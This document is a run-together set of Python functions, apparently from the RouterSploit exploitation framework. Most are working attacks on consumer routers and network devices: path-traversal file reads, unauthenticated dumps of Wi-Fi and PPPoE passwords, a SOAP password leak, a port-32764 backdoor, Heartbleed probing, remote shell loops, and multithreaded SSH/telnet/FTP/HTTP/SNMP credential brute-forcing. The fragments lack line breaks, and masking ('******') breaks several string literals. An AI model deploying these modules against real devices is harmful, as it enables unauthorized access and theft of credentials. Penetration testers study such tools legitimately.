def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name address = "{}:{}".format(self.target, self.port) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: string = data.next().strip() bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0") res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string) if res[0] is not None: running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) else: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): if self.check(): print_success("Target is vulnerable") url = "{}:{}".format(self.target, self.port) print "Visit: {}/\n".format(url) else: print_error("Target seems to be not vulnerable")
def run(self): self.session = requests.Session() if self.check(): print_success("Target seems to be vulnerable") print_status("Trying to authenticate") if self.login(): file_path = "../../..{}".format(self.path) url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(self.target, self.port, file_path) print_status("Requesting: {}".format(file_path)) response = http_request(method="GET", url=url, session=self.session) if response is None: print_error("Exploit failed") return print_status("Reading response...") if not len(response.text) or "empty or is not available to view" in response.text: print_error("Exploit failed. Empty response.") else: print_info(response.text) else: print_error("Exploit failed. Could not authenticate.") else: print_error("Exploit failed. Target seems to be not vulnerable.")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: running.clear() print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) else: print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") self.command_loop() else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print "\nUse your browser:" print "{}:{}/xslt".format(self.target, self.port) else: print_error("Target seems to be not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsbe") else: print_error("Target is not vulnerable")
def run(self): # address and parameters url = "{}:{}/cgi-bin/webproc".format(self.target, self.port) data = { "getpage": "html/index.html", "*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "******", "%3Apassword": "******", "%3Aaction": "login", "%3Asessionid": "abcdefgh" } # connection response = http_request(method="POST", url=url, data=data) if response is None: return if response.status_code == 200: print_success("Exploit success") print_status("File: {}".format(self.filename)) print response.text else: print_error("Exploit failed")
def run(self): url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return var = [ 'pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd' ] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, response.text) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): if self.check(): print_success("Target seems to be vulnerable") file_path = "..{}".format(self.filename) url = "{}:{}/apply.cgi".format(self.target, self.port) data = {"html_response_page": file_path, "action": "do_graph_auth", "login_name": "test", "login_pass": "******", "&login_n": "test2", "log_pass": "******", "graph_code": "63778", "session_id": "test5", "test": "test"} print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password)) response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) if response is None: return if response.status_code == 200: print_status("File: {}".format(self.filename)) print_info(response.text) else: print_error("Exploit failed - could not read response") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): url = sanitize_url( "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703" .format(self.target, self.port)) response = http_request(method="GET", url=url) if response is None: return try: print_status("Decoding JSON") data = json.loads(response.text) except ValueError: print_error("Exploit failed - response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() except StopIteration: break else: retries = 0 while retries < 3: try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) tn.close() if i != -1: print_error(name, "Username: '******' Password: '******'".format( user, password), verbose=module_verbosity) else: if any(map(lambda x: x in res, [ "#", "$", ">" ])) or len(res) > 500: # big banner e.g. mikrotik running.clear() print_success( "{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity) self.credentials.append((user, password)) tn.close() break except EOFError: print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return continue print_status(name, 'thread is terminated.', verbose=module_verbosity)
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Digest Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] with ThreadPoolExecutor(self.threads) as executor: for record in defaults: username, password = record.split(':') executor.submit(self.target_function, url, username, password) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def run(self): self.credentials = [] try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["login: "******"Login: "******"Connection error {}:{}".format( self.target, self.port)) return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port)) try: r = requests.get(url, verify=False) res = r.text except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return var = ['pppoe_username', 'pppoe_password', 'wl0_pskkey', 'wl0_key1', 'mradius_password', 'mradius_secret', 'httpd_password', 'http_passwd', 'pppoe_passwd'] data = [] for v in var: regexp = '{}="(.+?)"'.format(v) val = re.findall(regexp, res) if len(val): data.append((v, val[0])) if len(data): print_success("Exploit success") headers = ("Option", "Value") print_table(headers, *data) else: print_error("Exploit failed")
def run(self): vulnerabilities = [] for exploit in utils.iter_modules(utils.EXPLOITS_DIR): exploit = exploit() exploit.target = self.target exploit.port = self.port response = exploit.check() if response is True: print_success("{} is vulnerable".format(exploit)) vulnerabilities.append(exploit) elif response is False: print_error("{} is not vulnerable".format(exploit)) else: print_status("{} could not be verified".format(exploit)) if vulnerabilities: print_info() print_success("Device is vulnerable!") for v in vulnerabilities: print_info(" - {}".format(v)) else: print_error("Device is not vulnerable to any exploits!\n")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'thread is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port)) return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): try: print_status("Trying to authenticate to the telnet server") tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) if i != -1: print_error("Exploit failed") else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Authentication successful") tn.write("\r\n") tn.interact() else: print_error("Exploit failed") tn.close() except Exception: print_error("Connection error {}:{}".format( self.target, self.telnet_port))
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string), cmdgen.UdpTransportTarget((self.target, int(self.port))), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): self.credentials = [] print_status("Running module...") ssh = paramiko.SSHClient() try: ssh.connect(self.target, port=self.port) except socket.error: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ssh.close() return except: pass ssh.close() if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsel", method="wget", binary="wget", location="/var") else: print_error("Target is not vulnerable")
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="none", method="awk", binary="awk") else: print_error("Target is not vulnerable")
def run(self): if self.check(): if "DSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.DSSKey.from_private_key( StringIO.StringIO(self.valid['private_key'])) elif "RSA PRIVATE KEY" in self.valid['private_key']: pkey = paramiko.RSAKey.from_private_key( StringIO.StringIO(self.valid['private_key'])) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, 22, timeout=5, username=self.valid['user'], pkey=pkey) except: ssh.close() print_error("Device seems to be not vulnerable") else: print_success("SSH - Successful authentication") ssh_interactive(ssh) else: print_error("Exploit failed - target seems to be not vulnerable")
def attack(self): try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port)) return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(self.target, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass except: print_error("Exploit Failed - SSH Service is down") return trans = client.get_transport() try: trans.auth_password(username='******', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass except: print_status("Error with Existing Session. Wait few minutes.") return try: trans.auth_interactive(username='******', handler=self.custom_handler) print_success("Exploit succeeded") ssh_interactive(client) except: print_error("Exploit failed") return
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def login(self): url = "{}:{}/".format(self.target, self.port) try: response = self.session.get(url=url) if response is None: return print_status("Retrieving random login token...") Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text) if len(Frm_Logintoken): Frm_Logintoken = Frm_Logintoken[0] print_status("Trying to log in with credentials {} : {}".format(self.username, self.password)) url = "{}:{}/login.gch".format(self.target, self.port) data = {"Frm_Logintoken": Frm_Logintoken, "Username": self.username, "Password": self.password} response = self.session.post(url, data=data) if "Username" not in response.text and "Password" not in response.text: print_success("Successful authentication") return True except: pass return False
def run(self): url = "{}:{}/login.stm".format(self.target, self.port) response = http_request(method="GET", url=url) if response is None: return val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces if len(val): url = "{}:{}/login.cgi".format(self.target, self.port) payload = "pws=" + val[0] + "&arc_action=login&action=Submit" login = http_request(method="POST", url=url, data=payload) if login is None: return error = re.search('loginpserr.stm', login.text) if not error: print_success("Exploit success, you are now logged in!") return print_error("Exploit failed. Device seems to be not vulnerable.")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string), cmdgen.UdpTransportTarget((self.target, int(self.port))), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.exit_on_success): running.clear() print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def run(self): if self.check(): url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return regexps = [("admin", "pwdAdmin = '(.+?)'"), ("support", "pwdSupport = '(.+?)'"), ("user", "pwdUser = '******'")] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) if len(res): creds.append((regexp[0], b64decode(res[0]))) if len(creds): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *creds) print("NOTE: Admin is commonly implemented as root") else: print_error("Credentials could not be found") else: print_error("Device seems to be not vulnerable")
def login(self): url = "{}:{}/".format(self.target, self.port) try: response = self.session.get(url=url) if response is None: return print_status("Retrieving random login token...") Frm_Logintoken = re.findall(r'Frm_Logintoken"\).value = "(.*)";', response.text) if len(Frm_Logintoken): Frm_Logintoken = Frm_Logintoken[0] print_status( "Trying to log in with credentials {} : {}".format( self.username, self.password)) url = "{}:{}/login.gch".format(self.target, self.port) data = { "Frm_Logintoken": Frm_Logintoken, "Username": self.username, "Password": self.password } response = self.session.post(url, data=data) if "Username" not in response.text and "Password" not in response.text: print_success("Successful authentication") return True except: pass return False
def run(self): if self.check(): print_success("Target is vulnerable") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) s.connect((self.target, 32764)) conf = self.execute(s, 1) lines = re.split("\x00|\x01", conf) pattern = re.compile('user(name)?|password|login'); credentials = [] for line in lines: try: (var, value) = line.split("=") if len(value)>0 and pattern.search(var): credentials.append((var, value)) except ValueError: pass if len(credentials): print_table(("Parameter", "Value"), *credentials) else: print_error("Target is not vulnerable")
def attack(self): ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.port), timeout=10) except (socket.error, socket.timeout): print_error("Connection error: %s:%s" % (self.target, str(self.port))) ftp.close() return except: pass ftp.close() if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def login(self): url = "{}:{}/login.cgi?logout=1".format(self.target, self.port) data = { "username": self.username, "password": self.password, "target": "" } print_status("Trying to authenticate") response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session) if response is None: return False if response.status_code == 302 and "CGISESSID" in response.cookies.keys( ): print_status("CGI Session ID: {}".format( response.cookies['CGISESSID'])) print_success("Authenticated as {}:{}".format( self.username, self.password)) return True print_error("Exploit failed. Could not authenticate.") return False
def ftp_get_config(self): print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target, self.ftp_port, self.remote_user, self.remote_pass)) ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.ftp_port), timeout=10) ftp.login(self.remote_user, self.remote_pass) print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port)) if self.config_path in ftp.nlst(): print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path)) r = StringIO() ftp.retrbinary('RETR {}'.format(self.config_path), r.write) ftp.close() data = r.getvalue() creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data) if creds: print_success("Found encrypted credentials:") print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds) return creds else: print_error("Exploit failed - could not find any credentials") except ftplib.all_errors: print_error("Exploit failed - FTP error") return None
def run(self): url = sanitize_url("{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port)) print_status("Running module...") try: r = requests.get(url) res = r.text except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return try: data = json.loads(res) print_status("Decoding JSON value") except ValueError: print_error("Response is not valid JSON") return if len(data): print_success("Exploit success") rows = [] for key in data.keys(): if len(data[key]) > 0: rows.append((key, data[key])) headers = ("Parameter", "Value") print_table(headers, *rows)
def run(self): response = self.telnet_login() if 'Login not allowed' in response and self.is_port_opened(self.ftp_port): print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port)) print_status("FTP and HTTP service active") creds = self.ftp_get_config() if creds: print_status("Use javascript console (through developer tools) to bypass authentication:") payload = ('var user = "******"\n' 'var hash2 = "{}";\n' 'var HA2 = MD5("GET" + ":" + uri);\n' 'document.getElementById("user").value = user;\n' 'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n' 'document.authform.submit();\n') for user in creds: print_success("User: {} Role: {}".format(user[0], user[2])) print_info(payload.format(user[0], user[3])) elif '}=>' in response: print_success("Successful authentication through Telnet service") tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10) tn.read_until(': ') tn.write(self.remote_user + '\r\n') tn.read_until(': ') tn.write(self.remote_pass + '\r\n') tn.interact() else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): rootpath = 'routersploit/modules/' path = 'exploits/dlink/' # only py exploit files modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"] vulns = [] for module_name in modules: f = path + module_name module = imp.load_source('module', rootpath + f + '.py') exploit = module.Exploit() exploit.target = self.target exploit.port = self.port res = exploit.check() if res is True: print_success("{} is vulnerable".format(f)) vulns.append(f) elif res is False: print_error("{} is not vulnerable".format(f)) else: print_status("{} could not be verified".format(f)) print if len(vulns): print_success("Device is vulnerable!") for v in vulns: print " - {}".format(v) else: print_error("Device is not vulnerable to any exploits!") print
def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") shell(self, architecture="mips") else: print_error("Target is not vulnerable")
def hit_hb(self, s): while True: typ, ver, pay = self.recvmsg(s) if typ is None: print_error( "No heartbeat response received, server likely not vulnerable" ) return False if typ == 24: print_status("Received heartbeat response") self.hexdump(pay) if len(pay) > 3: print_success( "WARNING: server returned more data than it should - server is vulnerable!" ) else: print_error( "Server processed malformed heartbeat, but did not return any extra data." ) return if typ == 21: print_error("Server returned error, likely not vulnerable") print_error("Exploit failed") return
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append((self.target, self.port, user, password)) else: print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): url = "{}:{}/UD/?5".format(self.target, self.port) headers = { "SOAPACTION": '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', "Content-Type": 'text/xml; charset="utf-8"', "Expect": "100-continue", } data = ( '<?xml version="1.0"?>' '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' "<s:Body>" '<m:GetLoginPassword xmlns:m="urn:dslforum-org:service:UserInterface:1">' "</m:GetLoginPassword>" "</s:Body>" "</s:Envelope>" ) response = http_request(method="POST", url=url, headers=headers, data=data) if response is None: return r = re.compile("<NewUserpassword>(.*?)</NewUserpassword>") m = r.search(response.text) if m: print_success("Password has been found") print_info("Password: {}".format(m.group(1))) else: print_error("Exploit failed - could not find password")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = itertools.product(usernames, passwords) with threads.ThreadPoolExecutor(self.threads) as executor: for record in collection: executor.submit(self.target_function, url, record) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def run(self): creds = [] url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port)) # print_status("Requesting for {}".format(url)) response = http_request(method="GET", url=url) if response is None: return admin = re.findall("pwdAdmin = '(.+?)'", response.text) if admin: creds.append(('admin', admin[0])) support = re.findall("pwdSupport = '(.+?)'", response.text) if support: creds.append(('support', support[0])) user = re.findall("pwdUser = '******'", response.text) if user: creds.append(('user', user[0])) if creds: print_success("Credentials found!") print_table(("Login", "Password"), *creds) else: print_error("Credentials could not be found")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].encode('utf-8').strip() password = line[1].encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response.status_code != 401: running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): try: print_status("Trying to authenticate to the telnet server") tn = telnetlib.Telnet(self.target, 23) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(self.password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) if i != -1: print_error("Exploit failed") else: if any(map(lambda x: x in res, ["#", "$", ">"])): print_success("Authentication successful") tn.write("\r\n") tn.interact() else: print_error("Exploit failed") tn.close() except: print_error("Connection error {}:23".format(self.target))
def run(self): self.credentials = [] ssh = paramiko.SSHClient() try: ssh.connect(self.target, port=self.port) except socket.error: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ssh.close() return except: pass ssh.close() if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("Invoking command loop...") shell(self, architecture="mipsle") else: print_error("Exploit failed - target seems to be not vulnerable")
def run(self): print_status("Running module...") self.credentials = [] url = sanitize_url("{}:{}".format(self.target, self.port)) try: r = requests.get(url) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return if r.status_code != 401: print_status("Target is not protected by Basic Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Login", "Password") print_table(headers, *self.credentials) else: print_error("Credentials not found")